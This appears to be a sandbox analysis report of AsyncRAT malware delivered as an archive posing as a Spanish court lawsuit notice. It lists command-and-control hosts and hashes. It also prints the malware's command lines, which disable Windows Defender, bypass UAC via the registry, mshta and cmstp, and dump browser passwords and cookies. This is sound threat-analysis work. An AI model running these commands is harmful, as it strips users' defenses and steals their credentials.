Analysis
-
max time kernel
231s -
max time network
301s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
01-11-2024 14:04
Static task
static1
General
-
Target
Notifica Demanda Ref. 25421208-2024 Admite Juzgado Civil.7z
-
Size
918KB
-
MD5
61a102ca87cf67688a738bb3fefc8d24
-
SHA1
e5305654a242ce03a45b1da667d632f74eb50a25
-
SHA256
b9c39d6afb42a4bb5a0d79b2404d4ede5c52bdf930b6c0e7ee3fd9830ec117cc
-
SHA512
ac08402b118942de387f63ba08e3016813dd942b660c8a57336baa53c47fedf2ad159b4f1a983139b970fbf5888e7651126f6e8806e2fcae4fd19e869fac8dff
-
SSDEEP
24576:qXceahwpfZhdbN3OKALB+hUJgNzrrSux1NmKnW54NS3tsh:Rewwp/hNu+MQrmaJx4uh
Malware Config
Extracted
asyncrat
1.0.7
OCTU30
mjjhfyftuf.duckdns.org:8010
DcRatMutex_qwqdanchun
-
delay
1
-
install
false
-
install_folder
%AppData%
Extracted
asyncrat
| Edit 3LOSH RAT
Default
oooptesg.duckdns.org:8020
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
Processes:
resource yara_rule behavioral1/memory/2800-83-0x0000000007980000-0x00000000079A4000-memory.dmp disable_win_def -
Processes:
RegSvcs.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" RegSvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" RegSvcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" RegSvcs.exe -
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe -
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
Processes:
resource yara_rule behavioral1/memory/2800-37-0x00000000016E0000-0x000000000174A000-memory.dmp Nirsoft C:\Users\Admin\AppData\Local\Temp\WebBrowserPassView.exe Nirsoft behavioral1/memory/1912-76-0x0000000000400000-0x0000000000479000-memory.dmp Nirsoft -
NirSoft WebBrowserPassView 2 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule behavioral1/memory/2800-37-0x00000000016E0000-0x000000000174A000-memory.dmp WebBrowserPassView C:\Users\Admin\AppData\Local\Temp\WebBrowserPassView.exe WebBrowserPassView -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 3 IoCs
Processes:
Notifica Demanda Ref. 25421208-2024 Admite Juzgado Civil.exeWebBrowserPassView.exeChromeCookiesView.exepid process 4620 Notifica Demanda Ref. 25421208-2024 Admite Juzgado Civil.exe 4480 WebBrowserPassView.exe 1912 ChromeCookiesView.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
Notifica Demanda Ref. 25421208-2024 Admite Juzgado Civil.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AbzDesignerEditor = "C:\\Users\\Admin\\Music\\AbzDesignerUpdater\\AbzConvertVideo.exe" Notifica Demanda Ref. 25421208-2024 Admite Juzgado Civil.exe -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1364 powershell.exe 1712 powershell.exe 1696 powershell.exe 5096 powershell.exe 2748 powershell.exe 4736 powershell.exe 3092 powershell.exe 2016 powershell.exe 3736 powershell.exe 4532 powershell.exe 4692 powershell.exe 2768 powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
Notifica Demanda Ref. 25421208-2024 Admite Juzgado Civil.execsc.exedescription pid process target process PID 4620 set thread context of 2900 4620 Notifica Demanda Ref. 25421208-2024 Admite Juzgado Civil.exe csc.exe PID 2900 set thread context of 2800 2900 csc.exe RegSvcs.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\ChromeCookiesView.exe upx behavioral1/memory/1912-72-0x0000000000400000-0x0000000000479000-memory.dmp upx behavioral1/memory/1912-76-0x0000000000400000-0x0000000000479000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 23 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
csc.exeRegSvcs.exepowershell.exepowershell.exepowershell.exepowershell.exemshta.exeNotifica Demanda Ref. 25421208-2024 Admite Juzgado Civil.exeWebBrowserPassView.exepowershell.exepowershell.exepowershell.exeDllHost.exepowershell.exepowershell.exepowershell.exereg.exeChromeCookiesView.exetaskkill.execmstp.exepowershell.exepowershell.exemshta.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Notifica Demanda Ref. 25421208-2024 Admite Juzgado Civil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WebBrowserPassView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DllHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ChromeCookiesView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmstp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe -
Kills process with taskkill 3 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepid process 1104 taskkill.exe 4016 taskkill.exe 2252 taskkill.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 41 IoCs
Processes:
7zFM.exeWebBrowserPassView.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3664 7zFM.exe 3664 7zFM.exe 4480 WebBrowserPassView.exe 4480 WebBrowserPassView.exe 4480 WebBrowserPassView.exe 4480 WebBrowserPassView.exe 5064 powershell.exe 5064 powershell.exe 1712 powershell.exe 4736 powershell.exe 3092 powershell.exe 1696 powershell.exe 3736 powershell.exe 3736 powershell.exe 2016 powershell.exe 2016 powershell.exe 4532 powershell.exe 4532 powershell.exe 5096 powershell.exe 5096 powershell.exe 1712 powershell.exe 1712 powershell.exe 2748 powershell.exe 2748 powershell.exe 4736 powershell.exe 4736 powershell.exe 4692 powershell.exe 4692 powershell.exe 2768 powershell.exe 2768 powershell.exe 3092 powershell.exe 3092 powershell.exe 1696 powershell.exe 1696 powershell.exe 2016 powershell.exe 3736 powershell.exe 3736 powershell.exe 5096 powershell.exe 4532 powershell.exe 2748 powershell.exe 4692 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
7zFM.exepid process 3664 7zFM.exe -
Suspicious use of AdjustPrivilegeToken 39 IoCs
Processes:
7zFM.execsc.exeRegSvcs.exepowershell.exetaskkill.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeRestorePrivilege 3664 7zFM.exe Token: 35 3664 7zFM.exe Token: SeSecurityPrivilege 3664 7zFM.exe Token: SeDebugPrivilege 2900 csc.exe Token: SeDebugPrivilege 2800 RegSvcs.exe Token: SeDebugPrivilege 5064 powershell.exe Token: SeDebugPrivilege 1104 taskkill.exe Token: SeIncreaseQuotaPrivilege 5064 powershell.exe Token: SeSecurityPrivilege 5064 powershell.exe Token: SeTakeOwnershipPrivilege 5064 powershell.exe Token: SeLoadDriverPrivilege 5064 powershell.exe Token: SeSystemProfilePrivilege 5064 powershell.exe Token: SeSystemtimePrivilege 5064 powershell.exe Token: SeProfSingleProcessPrivilege 5064 powershell.exe Token: SeIncBasePriorityPrivilege 5064 powershell.exe Token: SeCreatePagefilePrivilege 5064 powershell.exe Token: SeBackupPrivilege 5064 powershell.exe Token: SeRestorePrivilege 5064 powershell.exe Token: SeShutdownPrivilege 5064 powershell.exe Token: SeDebugPrivilege 5064 powershell.exe Token: SeSystemEnvironmentPrivilege 5064 powershell.exe Token: SeRemoteShutdownPrivilege 5064 powershell.exe Token: SeUndockPrivilege 5064 powershell.exe Token: SeManageVolumePrivilege 5064 powershell.exe Token: 33 5064 powershell.exe Token: 34 5064 powershell.exe Token: 35 5064 powershell.exe Token: 36 5064 powershell.exe Token: SeDebugPrivilege 1712 powershell.exe Token: SeDebugPrivilege 4736 powershell.exe Token: SeDebugPrivilege 3092 powershell.exe Token: SeDebugPrivilege 1696 powershell.exe Token: SeDebugPrivilege 2016 powershell.exe Token: SeDebugPrivilege 3736 powershell.exe Token: SeDebugPrivilege 4532 powershell.exe Token: SeDebugPrivilege 5096 powershell.exe Token: SeDebugPrivilege 2748 powershell.exe Token: SeDebugPrivilege 4692 powershell.exe Token: SeDebugPrivilege 2768 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
7zFM.exepid process 3664 7zFM.exe 3664 7zFM.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
7zFM.exeNotifica Demanda Ref. 25421208-2024 Admite Juzgado Civil.execsc.exeRegSvcs.exedescription pid process target process PID 3664 wrote to memory of 4620 3664 7zFM.exe Notifica Demanda Ref. 25421208-2024 Admite Juzgado Civil.exe PID 3664 wrote to memory of 4620 3664 7zFM.exe Notifica Demanda Ref. 25421208-2024 Admite Juzgado Civil.exe PID 3664 wrote to memory of 4620 3664 7zFM.exe Notifica Demanda Ref. 25421208-2024 Admite Juzgado Civil.exe PID 4620 wrote to memory of 2900 4620 Notifica Demanda Ref. 25421208-2024 Admite Juzgado Civil.exe csc.exe PID 4620 wrote to memory of 2900 4620 Notifica Demanda Ref. 25421208-2024 Admite Juzgado Civil.exe csc.exe PID 4620 wrote to memory of 2900 4620 Notifica Demanda Ref. 25421208-2024 Admite Juzgado Civil.exe csc.exe PID 4620 wrote to memory of 2900 4620 Notifica Demanda Ref. 25421208-2024 Admite Juzgado Civil.exe csc.exe PID 4620 wrote to memory of 2900 4620 Notifica Demanda Ref. 25421208-2024 Admite Juzgado Civil.exe csc.exe PID 2900 wrote to memory of 2800 2900 csc.exe RegSvcs.exe PID 2900 wrote to memory of 2800 2900 csc.exe RegSvcs.exe PID 2900 wrote to memory of 2800 2900 csc.exe RegSvcs.exe PID 2900 wrote to memory of 2800 2900 csc.exe RegSvcs.exe PID 2900 wrote to memory of 2800 2900 csc.exe RegSvcs.exe PID 2900 wrote to memory of 2800 2900 csc.exe RegSvcs.exe PID 2900 wrote to memory of 2800 2900 csc.exe RegSvcs.exe PID 2900 wrote to memory of 2800 2900 csc.exe RegSvcs.exe PID 2800 wrote to memory of 4480 2800 RegSvcs.exe WebBrowserPassView.exe PID 2800 wrote to memory of 4480 2800 RegSvcs.exe WebBrowserPassView.exe PID 2800 wrote to memory of 4480 2800 RegSvcs.exe WebBrowserPassView.exe PID 2800 wrote to memory of 1912 2800 RegSvcs.exe ChromeCookiesView.exe PID 2800 wrote to memory of 1912 2800 RegSvcs.exe ChromeCookiesView.exe PID 2800 wrote to memory of 1912 2800 RegSvcs.exe ChromeCookiesView.exe PID 2800 wrote to memory of 5064 2800 RegSvcs.exe powershell.exe PID 2800 wrote to memory of 5064 2800 RegSvcs.exe powershell.exe PID 2800 wrote to memory of 5064 2800 RegSvcs.exe powershell.exe PID 2800 wrote to memory of 1104 2800 RegSvcs.exe taskkill.exe PID 2800 wrote to memory of 1104 2800 RegSvcs.exe taskkill.exe PID 2800 wrote to memory of 1104 2800 RegSvcs.exe taskkill.exe PID 2800 wrote to memory of 1812 2800 RegSvcs.exe cmstp.exe PID 2800 wrote to memory of 1812 2800 RegSvcs.exe cmstp.exe PID 2800 wrote to memory of 1812 2800 RegSvcs.exe cmstp.exe PID 2800 wrote to memory of 1712 2800 RegSvcs.exe powershell.exe PID 2800 wrote to memory of 1712 2800 RegSvcs.exe powershell.exe PID 2800 wrote to memory of 1712 2800 RegSvcs.exe powershell.exe PID 2800 wrote to memory of 4736 2800 RegSvcs.exe powershell.exe PID 2800 wrote to memory of 4736 2800 RegSvcs.exe powershell.exe PID 2800 wrote to memory of 4736 2800 RegSvcs.exe powershell.exe PID 2800 wrote to memory of 1696 2800 RegSvcs.exe powershell.exe PID 2800 wrote to memory of 1696 2800 RegSvcs.exe powershell.exe PID 2800 wrote to memory of 1696 2800 RegSvcs.exe powershell.exe PID 2800 wrote to memory of 3092 2800 RegSvcs.exe powershell.exe PID 2800 wrote to memory of 3092 2800 RegSvcs.exe powershell.exe PID 2800 wrote to memory of 3092 2800 RegSvcs.exe powershell.exe PID 2800 wrote to memory of 2016 2800 RegSvcs.exe powershell.exe PID 2800 wrote to memory of 2016 2800 RegSvcs.exe powershell.exe PID 2800 wrote to memory of 2016 2800 RegSvcs.exe powershell.exe PID 2800 wrote to memory of 3736 2800 RegSvcs.exe powershell.exe PID 2800 wrote to memory of 3736 2800 RegSvcs.exe powershell.exe PID 2800 wrote to memory of 3736 2800 RegSvcs.exe powershell.exe PID 2800 wrote to memory of 5096 2800 RegSvcs.exe powershell.exe PID 2800 wrote to memory of 5096 2800 RegSvcs.exe powershell.exe PID 2800 wrote to memory of 5096 2800 RegSvcs.exe powershell.exe PID 2800 wrote to memory of 4532 2800 RegSvcs.exe powershell.exe PID 2800 wrote to memory of 4532 2800 RegSvcs.exe powershell.exe PID 2800 wrote to memory of 4532 2800 RegSvcs.exe powershell.exe PID 2800 wrote to memory of 2748 2800 RegSvcs.exe powershell.exe PID 2800 wrote to memory of 2748 2800 RegSvcs.exe powershell.exe PID 2800 wrote to memory of 2748 2800 RegSvcs.exe powershell.exe PID 2800 wrote to memory of 4692 2800 RegSvcs.exe powershell.exe PID 2800 wrote to memory of 4692 2800 RegSvcs.exe powershell.exe PID 2800 wrote to memory of 4692 2800 RegSvcs.exe powershell.exe PID 2800 wrote to memory of 2768 2800 RegSvcs.exe powershell.exe PID 2800 wrote to memory of 2768 2800 RegSvcs.exe powershell.exe PID 2800 wrote to memory of 2768 2800 RegSvcs.exe powershell.exe
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Notifica Demanda Ref. 25421208-2024 Admite Juzgado Civil.7z"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3664 -
C:\Users\Admin\AppData\Local\Temp\7zO05E6F8D7\Notifica Demanda Ref. 25421208-2024 Admite Juzgado Civil.exe"C:\Users\Admin\AppData\Local\Temp\7zO05E6F8D7\Notifica Demanda Ref. 25421208-2024 Admite Juzgado Civil.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4620 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"3⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2900 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2800 -
C:\Users\Admin\AppData\Local\Temp\WebBrowserPassView.exe"C:\Users\Admin\AppData\Local\Temp\WebBrowserPassView.exe" /stext C:\Users\Admin\AppData\Local\Temp\WebBrowserPassView.txt5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4480 -
C:\Users\Admin\AppData\Local\Temp\ChromeCookiesView.exe"C:\Users\Admin\AppData\Local\Temp\ChromeCookiesView.exe" /scookiestxt "C:\Users\Admin\AppData\Local\Temp\CookiesView\Google_Default.txt"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1912 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5064 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /im cmstp.exe /f5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1104 -
C:\Windows\SysWOW64\cmstp.exe"C:\Windows\system32\cmstp.exe" /au C:\Windows\temp\j5u5a5g5.inf5⤵
- System Location Discovery: System Language Discovery
PID:1812 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1712 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4736 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1696 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3092 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2016 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 65⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3736 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 05⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5096 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 65⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4532 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 65⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2748 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4692 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 25⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2768 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /im cmstp.exe /f5⤵
- Kills process with taskkill
PID:4016 -
C:\Windows\SysWOW64\cmstp.exe"C:\Windows\system32\cmstp.exe" /au C:\Windows\temp\yh4545g5.inf5⤵PID:2648
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /im cmstp.exe /f5⤵
- Kills process with taskkill
PID:2252 -
C:\Windows\SysWOW64\cmstp.exe"C:\Windows\system32\cmstp.exe" /au C:\Windows\temp\zgtp0r00.inf5⤵PID:3112
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}1⤵
- System Location Discovery: System Language Discovery
PID:1992 -
C:\Windows\SysWOW64\mshta.exemshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f"", 0, true:close")2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:648 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:4400 -
C:\Windows\SysWOW64\mshta.exemshta vbscript:Execute("CreateObject(ChrW(87) + ChrW(83) + ChrW(99) + ChrW(114) + ChrW(105) + ChrW(112) + ChrW(116) + ChrW(46) + ChrW(83) + ChrW(104) + ChrW(101) + ChrW(108) + ChrW(108)).Run ""powershell.exe Stop-Process -Name 'cmstp'"", 0, true:close")2⤵
- System Location Discovery: System Language Discovery
PID:2092 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Stop-Process -Name 'cmstp'3⤵PID:1756
-
C:\Windows\SysWOW64\mshta.exemshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\Users\Public\Remove.ps1"",0:close")2⤵PID:760
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command C:\Users\Public\Remove.ps13⤵
- Command and Scripting Interpreter: PowerShell
PID:1364 -
C:\Windows\SysWOW64\mshta.exemshta vbscript:Execute("CreateObject(ChrW(87) + ChrW(83) + ChrW(99) + ChrW(114) + ChrW(105) + ChrW(112) + ChrW(116) + ChrW(46) + ChrW(83) + ChrW(104) + ChrW(101) + ChrW(108) + ChrW(108)).Run ""powershell.exe Stop-Process -Name 'cmstp'"", 0, true:close")2⤵PID:2480
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Stop-Process -Name 'cmstp'3⤵PID:240
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Modify Registry
4Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
71KB
MD5e1a4327af3cd8ca866996f472f0ff93a
SHA1cfea8426ef8fab4136055401152821a19f908d45
SHA2565f0bc7d75f32981e0e704c2217ed423c9a355f19515a1603103cc55cf9d3b901
SHA512745f1ec495869d2fa2722ecadcaa27ec1f005742c69110802e9e1d7600d680d077e9762a400799e38003a4671a2590ecf1c480c2e7586039ebcce6ed36662280
-
Filesize
2.3MB
MD59303575597168ef11790500b29279f56
SHA1bfab0ea30c5959fda893b9ddc6a348a4f47f8677
SHA2560a507a553010c19369f17b649c5ffe6060216480059062ff75241944cf729bd7
SHA5128e9f7a98c0a0c90643403d4abccd8736d12ba6bef83679ccfd626e52e86ed7db6fe558c6ec48a88cf32967c00d66131f550ac64cc98cd73fd477f165694e68b0
-
Filesize
65KB
MD547aa03a10ac3a407f8f30f1088edcbc9
SHA1b5d78a1d3ae93bd343c6d65e64c0945d1d558758
SHA256c79a2bb050af6436b10b58ef04dbc7082df1513cec5934432004eb56fba05e66
SHA5123402ca68b00ffd9e2551f97b3895990ee0274f14f117505c3588ea76c716488860ac2da07c1d9275bbc43eb87b88893c52fb04d15f1afe7b7bf7d9a524961101
-
Filesize
2KB
MD5f811272c20ff6decbbd16ff364334427
SHA1cb31be66c972daa61d45920fa2fa824c1dfb194d
SHA256730aff8c9e430a9f9e5e44f1c376e57f42fa5adc744824df2f69855009473592
SHA5125c68bf3a41c3607cad5abe94f2bb3816f3e69426fa7d43bf7c9787c4e9ce6660b1843a2e505a22a93d7008b76fc564078513fe9ef47051e5b6fc344ab9d0a528
-
Filesize
20KB
MD5e4b2393d8ea96abfbdddb5a69980f6d3
SHA167fbb4d663737ce1c023cee8b6bd194c7f3fe844
SHA256573c63e58ad7b0d5e9641f5477e7e18e52cded7b9c5b3cd1027504a3f90d5e0e
SHA51274a483e24dd8ffe3b407471d9989d929634b7ba6f745928a36fff989292eadf11e5522a0db2b0e3a427dab5930f77b606df7bb7b4ea64779c727d74d4d9f4b11
-
Filesize
21KB
MD56ce580c63fcd0c6c7d1e9002628ed267
SHA1ae3522c88487318f90956807874bb71682906ee7
SHA2567f49b0444d4925846ccccd0cf10e76bc572bb808d4f98674f49d05c34b616bc9
SHA512eec4b39a5ec971d14320de9d4ae2d96a5b3b6df720ad2488ba31d05c6b07eca7aef87c9f6daddbeb809bc85ea230a6b883f96ba95fff280c9916e1ceeabf04a4
-
Filesize
21KB
MD58ebc48bb7946fe6b05fab65160af8af5
SHA18b8c6224fa98b7d274763733e0877f5feab4eb26
SHA2565f9fdc45b9595d3640dd8489ff62265aa21aefe097b4accddc137362b502d5a5
